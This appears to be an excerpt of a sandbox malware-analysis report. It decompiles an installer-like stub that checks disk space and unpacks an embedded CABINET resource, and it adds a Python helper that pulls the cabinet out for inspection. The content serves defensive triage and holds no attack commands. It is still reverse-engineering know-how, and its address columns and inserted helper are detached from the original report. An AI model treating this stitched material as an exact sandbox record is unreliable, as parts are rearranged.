control_flow_graph 324 13597d-1359b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1359bb-1359d8 call 1344b9 call 136285 324->325 326 1359dd-135a1b GetDiskFreeSpaceA 324->326 343 135c05-135c14 call 136ce0 325->343 328 135ba1-135bde memset call 136285 GetLastError FormatMessageA 326->328 329 135a21-135a4a MulDiv 326->329 339 135be3-135bfc call 1344b9 SetCurrentDirectoryA 328->339 329->328 332 135a50-135a6c GetVolumeInformationA 329->332 335 135ab5-135aca SetCurrentDirectoryA 332->335 336 135a6e-135ab0 memset call 136285 GetLastError FormatMessageA 332->336 337 135acc-135ad1 335->337 336->339 341 135ad3-135ad8 337->341 342 135ae2-135ae4 337->342 351 135c02 339->351 341->342 347 135ada-135ae0 341->347 349 135ae7-135af8 342->349 350 135ae6 342->350 347->337 347->342 353 135af9-135afb 349->353 350->349 354 135c04 351->354 355 135b05-135b08 353->355 356 135afd-135b03 353->356 354->343 357 135b20-135b27 355->357 358 135b0a-135b1b call 1344b9 355->358 356->353 356->355 360 135b52-135b5b 357->360 361 135b29-135b33 357->361 358->351 362 135b62-135b6d 360->362 361->360 364 135b35-135b50 361->364 365 135b76-135b7d 362->365 366 135b6f-135b74 362->366 364->362 368 135b83 365->368 369 135b7f-135b81 365->369 367 135b85 366->367 370 135b87-135b94 call 13268b 367->370 371 135b96-135b9f 367->371 368->367 369->367 370->354 371->354

C-Code - Quality: 96%

E0013597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
	signed int _v8;
	char _v16;
	char _v276;
	char _v788;
	long _v792;
	long _v796;
	long _v800;
	signed int _v804;
	long _v808;
	int _v812;
	long _v816;
	long _v820;
	void* __ebx;
	void* __esi;
	signed int _t46;
	int _t50;
	signed int _t55;
	void* _t66;
	int _t69;
	signed int _t73;
	signed short _t78;
	signed int _t87;
	signed int _t101;
	int _t102;
	unsigned int _t103;
	unsigned int _t105;
	signed int _t111;
	long _t112;
	signed int _t116;
	CHAR* _t118;
	signed int _t119;
	signed int _t120;

	_t114 = __edi;
	_t46 =  *0x138004; // 0xe764604f
	_v8 = _t46 ^ _t120;
	_v804 = __edx;
	_t118 = __ecx;
	GetCurrentDirectoryA(0x104,  &_v276);
	_t50 = SetCurrentDirectoryA(_t118); // executed
	if(_t50 != 0) {
		_push(__edi);
		_v796 = 0;
		_v792 = 0;
		_v800 = 0;
		_v808 = 0;
		_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
		__eflags = _t55;
		if(_t55 == 0) {
			L29:
			memset( &_v788, 0, 0x200);
			 *0x139124 = E00136285();
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
			_t110 = 0x4b0;
			L30:
			__eflags = 0;
			E001344B9(0, _t110, _t118,  &_v788, 0x10, 0);
			SetCurrentDirectoryA( &_v276);
			L31:
			_t66 = 0;
			__eflags = 0;
			L32:
			_pop(_t114);
			goto L33;
		}
		_t69 = _v792 * _v796;
		_v812 = _t69;
		_t116 = MulDiv(_t69, _v800, 0x400);
		__eflags = _t116;
		if(_t116 == 0) {
			goto L29;
		}
		_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
		__eflags = _t73;
		if(_t73 != 0) {
			SetCurrentDirectoryA( &_v276); // executed
			_t101 =  &_v16;
			_t111 = 6;
			_t119 = _t118 - _t101;
			__eflags = _t119;
			while(1) {
				_t22 = _t111 - 4; // 0x2
				__eflags = _t22;
				if(_t22 == 0) {
					break;
				}
				_t87 =  *((intOrPtr*)(_t119 + _t101));
				__eflags = _t87;
				if(_t87 == 0) {
					break;
				}
				 *_t101 = _t87;
				_t101 = _t101 + 1;
				_t111 = _t111 - 1;
				__eflags = _t111;
				if(_t111 != 0) {
					continue;
				}
				break;
			}
			__eflags = _t111;
			if(_t111 == 0) {
				_t101 = _t101 - 1;
				__eflags = _t101;
			}
			 *_t101 = 0;
			_t112 = 0x200;
			_t102 = _v812;
			_t78 = 0;
			_t118 = 8;
			while(1) {
				__eflags = _t102 - _t112;
				if(_t102 == _t112) {
					break;
				}
				_t112 = _t112 + _t112;
				_t78 = _t78 + 1;
				__eflags = _t78 - _t118;
				if(_t78 < _t118) {
					continue;
				}
				break;
			}
			__eflags = _t78 - _t118;
			if(_t78 != _t118) {
				__eflags =  *0x139a34 & 0x00000008;
				if(( *0x139a34 & 0x00000008) == 0) {
					L20:
					_t103 =  *0x139a38; // 0x0
					_t110 =  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4));
					L21:
					__eflags = (_v804 & 0x00000003) - 3;
					if((_v804 & 0x00000003) != 3) {
						__eflags = _v804 & 0x00000001;
						if((_v804 & 0x00000001) == 0) {
							__eflags = _t103 - _t116;
						} else {
							__eflags = _t110 - _t116;
						}
					} else {
						__eflags = _t103 + _t110 - _t116;
					}
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									 *0x139124 = 0;
                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t66 = E0013268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t105 =  *0x139a38; // 0x0
                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x139a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E001344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E001344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00136CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

Instruction address column for the decompiled function above (0x0013597d to 0x00135c04), detached from its code lines during extraction.
                                                                                                                                                                                                    0x00135b29
                                                                                                                                                                                                    0x00135b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b35
                                                                                                                                                                                                    0x00135b48
                                                                                                                                                                                                    0x00135b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b4a
                                                                                                                                                                                                    0x00135b0f
                                                                                                                                                                                                    0x00135b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b16
                                                                                                                                                                                                    0x00135a7c
                                                                                                                                                                                                    0x00135a8a
                                                                                                                                                                                                    0x00135aa5
                                                                                                                                                                                                    0x00135aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001359bb
                                                                                                                                                                                                    0x001359c0
                                                                                                                                                                                                    0x001359c7
                                                                                                                                                                                                    0x001359d1
                                                                                                                                                                                                    0x001359d6
                                                                                                                                                                                                    0x00135c05
                                                                                                                                                                                                    0x00135c14
                                                                                                                                                                                                    0x00135c14

APIs
• GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001359A8
• SetCurrentDirectoryA.KERNELBASE(?), ref: 001359AF
• GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00135A13
• MulDiv.KERNEL32(?,?,00000400), ref: 00135A40
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00135A64
• memset.MSVCRT ref: 00135A7C
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00135A98
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00135AA5
• SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00135BFC
  • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
  • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
  • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: ec7c6f1b1773a5004b20fccbf376f40ea21fdf590b08b8870d6b016f667c7811
• Instruction ID: 46ab6cc2fa824e7cd44e664f181afffb17ed8a8cc2c803d00a07e3963e3ee16e
• Opcode Fuzzy Hash: ec7c6f1b1773a5004b20fccbf376f40ea21fdf590b08b8870d6b016f667c7811
• Instruction Fuzzy Hash: E47190B190020CAFEB299F60CC85FFBB7AEEB48744F5441A9F545D7580EB709E858B60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph for function 00134FE0 not reproduced; legend: Executed / Not Executed)
C-Code - Quality: 77%
E00134FE0(void* __edi, void* __eflags) {
	void* __ebx;
	void* _t8;
	struct HWND__* _t9;
	int _t10;
	void* _t12;
	struct HWND__* _t24;
	struct HWND__* _t27;
	intOrPtr _t29;
	void* _t33;
	int _t34;
	CHAR* _t36;
	int _t37;
	intOrPtr _t47;

	_t33 = __edi;
	// Locate the embedded cabinet stored as resource "CABINET" (type 0xa = RT_RCDATA)
	_t36 = "CABINET";
	 *0x139144 = E0013468F(_t36, 0, 0);
	_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
	 *0x139140 = _t8;
	if(_t8 == 0) {
		return _t8;
	}
	_t9 =  *0x138584; // 0x0 (main dialog handle, if a window was created)
	if(_t9 != 0) {
		ShowWindow(GetDlgItem(_t9, 0x842), 0); // SW_HIDE
		ShowWindow(GetDlgItem( *0x138584, 0x841), 5); // SW_SHOW; executed
	}
	_t10 = E00134EFD(0, 0); // executed
	if(_t10 != 0) {
		// CABINET.dll ordinal 20 (FDICreate): build a File Decompression Interface
		// context from the supplied alloc/free/open/read/write/close/seek callbacks
		__imp__#20(E00134CA0, E00134CC0, E00134980, E00134A50, E00134AD0, E00134B60, E00134BC0, 1, 0x139148, _t33);
		_t34 = _t10;
		if(_t34 == 0) {
			L8:
			// Failure path: show a resource-string message box (subcall 001344B9
			// wraps LoadStringA/MessageBoxA; 0x10 = MB_ICONERROR)
			_t29 =  *0x139148; // 0x0 (ERF structure filled by FDI on error)
			_t24 =  *0x138584; // 0x0
			E001344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
			_t37 = 0;
			L9:
			goto L10;
		}
		// CABINET.dll ordinal 22 (FDICopy): extract the in-memory cabinet
		// "*MEMCAB" via the notification callback E00134CD0; executed
		__imp__#22(_t34, "*MEMCAB", 0x131140, 0, E00134CD0, 0, 0x139140);
		_t37 = _t10;
		if(_t37 == 0) {
			goto L9;
		}
		__imp__#23(_t34); // CABINET.dll ordinal 23 (FDIDestroy); executed
		if(_t10 != 0) {
			goto L9;
		}
		goto L8;
	} else {
		_t27 =  *0x138584; // 0x0
		E001344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
		_t37 = 0;
		L10:
		// Release the locked resource once extraction has finished or failed
		_t12 =  *0x139140; // 0x0
		if(_t12 != 0) {
			FreeResource(_t12);
			 *0x139140 = 0;
		}
		if(_t37 == 0) {
			_t47 =  *0x1391d8; // 0x0
			if(_t47 == 0) {
				E001344B9(0, 0x4f8, 0, 0, 0x10, 0);
			}
		}
		// Notify the dialog of the result unless the quiet/no-UI flags are set
		if(( *0x138a38 & 0x00000001) == 0 && ( *0x139a34 & 0x00000001) == 0) {
			SendMessageA( *0x138584, 0xfa1, _t37, 0);
		}
		return _t37;
	}
}

Instruction addresses:
0x00134fe0 0x00134fe6 0x00134ff9 0x0013500d 0x00135013 0x0013501a 0x00135163 0x00135163
0x00135020 0x00135027 0x00135037 0x00135051 0x00135051 0x00135057 0x0013505e 0x001350a7
0x001350ad 0x001350b4 0x001350e8 0x001350e8 0x001350ee 0x001350ff 0x00135104 0x00135106
0x00000000 0x00135106 0x001350cd 0x001350d3 0x001350da 0x00000000 0x00000000 0x001350dd
0x001350e6 0x00000000 0x00000000 0x00000000 0x00135060 0x00135060 0x00135070 0x00135075
0x00135107 0x00135107 0x0013510e 0x00135111 0x00135117 0x00135117 0x0013511f 0x00135121
0x00135127 0x00135135 0x00135135 0x00135127 0x00135141 0x00135159 0x00135159 0x00000000
0x0013515f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00134FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00135006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0013500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00135030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00135037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0013504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00135051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00135111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00135159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: abf4c8cb0b82ba0bfe77c035a8c8371e055677c585bf2d82fab1cd3056b6fb03
                                                                                                                                                                                                    • Instruction ID: caff2542cde5c304f9f11f99f85fc26eba5d54a1557458d92439e0b04947600a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: abf4c8cb0b82ba0bfe77c035a8c8371e055677c585bf2d82fab1cd3056b6fb03
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31EAB0780701BFE7205B61AD8AF673A6DBB14B55F040024F946B29A1DBF5DC808A61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
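The API sequence listed for this function (FindResourceA with type 0x0000000A, which is RT_RCDATA, and name CABINET, followed by LoadResource and LockResource, with the string *MEMCAB alongside) is the pattern of a self-extracting stub that keeps its cabinet as an RCDATA resource and hands it to the cabinet API from memory. The following Python is an added triage helper, not code from this report, from Joe Sandbox, or from the sample: it walks a PE .rsrc section image by hand (type, name, language), pulls the RCDATA resources named CABINET and TITLE, and checks the former for the MSCF signature that every cabinet file starts with. The function names iter_resources, find_resource, triage_sfx_cab and build_rsrc are this example's own; build_rsrc only constructs an in-memory fixture so the code runs offline, and the RVA 0x1A000, the language id and the embedded payload bytes are invented test data, not bytes from the analysed file.

```python
import struct

RT_RCDATA = 10        # resource type 0x0000000A seen in the FindResourceA calls above
CAB_MAGIC = b"MSCF"   # first four bytes of every Microsoft Cabinet file


def _read_name(rsrc, off):
    # IMAGE_RESOURCE_DIR_STRING_U: u16 length in WCHARs, then UTF-16LE characters
    (n,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * n].decode("utf-16-le")


def _entries(rsrc, dir_off):
    # IMAGE_RESOURCE_DIRECTORY: the two u16 entry counts sit at +12, entries start at +16
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        key, target = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        if key & 0x80000000:                       # high bit set: key is a string offset
            key = _read_name(rsrc, key & 0x7FFFFFFF)
        yield key, bool(target & 0x80000000), target & 0x7FFFFFFF  # high bit: subdirectory


def iter_resources(rsrc, rsrc_rva):
    """Walk a .rsrc image (type -> name -> language) and yield (type, name, lang, data)."""
    for rtype, tdir, toff in _entries(rsrc, 0):
        if not tdir:
            continue
        for rname, ndir, noff in _entries(rsrc, toff):
            if not ndir:
                continue
            for lang, ldir, loff in _entries(rsrc, noff):
                if ldir:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, so subtract the section RVA
                data_rva, size = struct.unpack_from("<II", rsrc, loff)
                yield rtype, rname, lang, rsrc[data_rva - rsrc_rva:data_rva - rsrc_rva + size]


def find_resource(rsrc, rsrc_rva, rtype, rname):
    """First resource matching (type, name), like FindResourceA; None if absent."""
    for t, n, _lang, data in iter_resources(rsrc, rsrc_rva):
        if t == rtype and n == rname:
            return data
    return None


def triage_sfx_cab(rsrc, rsrc_rva):
    """Does this image carry an RCDATA 'CABINET' resource, and is it really a CAB?"""
    cab = find_resource(rsrc, rsrc_rva, RT_RCDATA, "CABINET")
    title = find_resource(rsrc, rsrc_rva, RT_RCDATA, "TITLE")
    return {
        "has_cabinet": cab is not None,
        "cabinet_is_cab": cab is not None and cab[:4] == CAB_MAGIC,
        "cabinet_size": len(cab) if cab else 0,
        "title": title.split(b"\x00", 1)[0].decode("ascii", "replace") if title else None,
    }


def build_rsrc(rsrc_rva, tree):
    """Constructed fixture only: lay out {type: {name: {lang: data}}} as a .rsrc image."""
    def dsize(n):
        return 16 + 8 * n
    names = [(t, n) for t in tree for n in tree[t]]
    leaves = [(t, n, l) for t, n in names for l in tree[t][n]]
    cur = dsize(len(tree))                          # type directory sits at offset 0
    name_off, lang_off, entry_off, str_off, data_off = {}, {}, {}, {}, {}
    for t in tree:
        name_off[t], cur = cur, cur + dsize(len(tree[t]))
    for t, n in names:
        lang_off[(t, n)], cur = cur, cur + dsize(len(tree[t][n]))
    for leaf in leaves:
        entry_off[leaf], cur = cur, cur + 16         # one IMAGE_RESOURCE_DATA_ENTRY each
    for _t, n in names:
        if isinstance(n, str) and n not in str_off:
            str_off[n], cur = cur, cur + 2 + 2 * len(n)
    for t, n, l in leaves:
        data_off[(t, n, l)], cur = cur, cur + len(tree[t][n][l])
    out = bytearray(cur)

    def write_dir(off, entries):                    # entries: [(key, target, is_dir)]
        entries = sorted(entries, key=lambda e: not isinstance(e[0], str))  # names first
        named = sum(isinstance(k, str) for k, _, _ in entries)
        struct.pack_into("<IIHHHH", out, off, 0, 0, 0, 0, named, len(entries) - named)
        for i, (k, target, is_dir) in enumerate(entries):
            key = 0x80000000 | str_off[k] if isinstance(k, str) else k
            struct.pack_into("<II", out, off + 16 + 8 * i, key, target | (0x80000000 if is_dir else 0))

    write_dir(0, [(t, name_off[t], True) for t in tree])
    for t in tree:
        write_dir(name_off[t], [(n, lang_off[(t, n)], True) for n in tree[t]])
    for t, n in names:
        write_dir(lang_off[(t, n)], [(l, entry_off[(t, n, l)], False) for l in tree[t][n]])
    for t, n, l in leaves:
        d = tree[t][n][l]
        struct.pack_into("<IIII", out, entry_off[(t, n, l)], rsrc_rva + data_off[(t, n, l)], len(d), 0, 0)
        out[data_off[(t, n, l)]:data_off[(t, n, l)] + len(d)] = d
    for s, off in str_off.items():
        struct.pack_into("<H", out, off, len(s))
        out[off + 2:off + 2 + 2 * len(s)] = s.encode("utf-16-le")
    return bytes(out)


# Constructed sample input (not bytes from the analysed file): a CAB-like blob plus a title.
SAMPLE_RVA = 0x1A000
SAMPLE_RSRC = build_rsrc(SAMPLE_RVA, {
    RT_RCDATA: {
        "CABINET": {0x409: CAB_MAGIC + b"\x00" * 32 + b"payload.exe\x00"},
        "TITLE": {0x409: b"Setup\x00"},
    },
})
```

On a real file, pass the raw bytes of the .rsrc section and that section's VirtualAddress from the PE section table as `rsrc` and `rsrc_rva`; the data entries store RVAs, so a section offset on its own is not enough. If `cabinet_is_cab` is true, writing the returned bytes to a .cab file lets the payload be listed and extracted with a cabinet tool without running the stub.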

Control-flow Graph

Basic blocks (address range, notable calls) and their successors, reconstructed from the graph data:

406  1344b9-1344f8                          -> 407, 408
407  134679-13467b                          -> 411
408  1344fe-134525  LoadStringA             -> 409, 410
409  134562-134568                          -> 412
410  134527-13452e  call 13681f             -> 420, 421
411  13467c-13468c  call 136ce0
412  13456b-134570                          -> 412, 416
416  134572-13457c                          -> 418, 419
418  1345c9-1345cb                          -> 424, 425
419  13457e-134580                          -> 422
420  134530-13453d  call 1367c9             -> 421, 426
421  13453f                                 -> 426
422  134583-134588                          -> 422, 429
424  134607-134617  LocalAlloc              -> 427, 428
425  1345cd-1345cf                          -> 431
426  134544-134554  MessageBoxA             -> 427
427  13455a-13455d                          -> 411
428  13461d-134628  call 131680             -> 435
429  13458a-13458c                          -> 433
431  1345d2-1345d7                          -> 431, 434
433  13458f-134594                          -> 433, 436
434  1345d9-1345ed  LocalAlloc              -> 427, 437
435  13462d-13463d  MessageBeep call 13681f -> 444, 445
436  134596-1345ad  LocalAlloc              -> 427, 440
437  1345f3-134605  call 13171e             -> 435
440  1345af-1345c7  call 13171e             -> 435
444  13463f-13464c  call 1367c9             -> 445, 448
445  13464e                                 -> 448
448  134653-134677  MessageBoxA LocalFree   -> 411
                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x138004; // 0xe764604f
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x138a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x139a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00131680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0013171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0013171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0013681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E001367C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0013681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E001367C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00136CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}
                                                                                                                                                                                                    0x00134628
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134628
                                                                                                                                                                                                    0x001345cd
                                                                                                                                                                                                    0x001345cd
                                                                                                                                                                                                    0x001345cf
                                                                                                                                                                                                    0x001345cf
                                                                                                                                                                                                    0x001345d2
                                                                                                                                                                                                    0x001345d2
                                                                                                                                                                                                    0x001345d4
                                                                                                                                                                                                    0x001345d5
                                                                                                                                                                                                    0x001345db
                                                                                                                                                                                                    0x001345de
                                                                                                                                                                                                    0x001345e3
                                                                                                                                                                                                    0x001345e9
                                                                                                                                                                                                    0x001345ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001345f3
                                                                                                                                                                                                    0x001345fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134602
                                                                                                                                                                                                    0x001345ed
                                                                                                                                                                                                    0x0013457e
                                                                                                                                                                                                    0x0013457e
                                                                                                                                                                                                    0x00134580
                                                                                                                                                                                                    0x00134580
                                                                                                                                                                                                    0x00134583
                                                                                                                                                                                                    0x00134583
                                                                                                                                                                                                    0x00134585
                                                                                                                                                                                                    0x00134586
                                                                                                                                                                                                    0x0013458a
                                                                                                                                                                                                    0x0013458c
